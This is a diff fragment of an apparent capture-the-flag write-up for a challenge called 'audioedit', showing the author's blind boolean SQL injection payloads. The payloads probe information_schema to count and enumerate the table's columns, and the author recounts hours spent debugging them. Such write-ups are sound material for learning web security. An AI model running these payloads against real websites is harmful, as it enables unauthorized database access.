machinexa2/machinexa2.github.io/writeups/_posts/2020-09-19-audioedit.markdown

 `' and 2=2 or (SELECT substr(count(*),1,1) FROM information_schema.columns WHERE table_name = 'audioedit')=1 or '`
 <br>
-So, number of columns are 5, now what.
+So, after running script i know number of columns are 5, now what.
 Now, this part was very tough to debug.
 I just went mad trying to find out what was the problem.
 It took about 3 hours to find what was the problem.
 I crafted about 4-5 payloads, none of them were working.
 ```sql
 ' and 2=2 or (SELECT substr(column_name,1,1) FROM information_schema.columns where table_name='audioedit' limit 1 OFFSET 1)='a' or '
 ' and 2=2 or (SELECT((SELECT count(*) FROM information_schema.columns WHERE table_name = 'audioedit' and column_name LIKE 'xx%')=1)) or '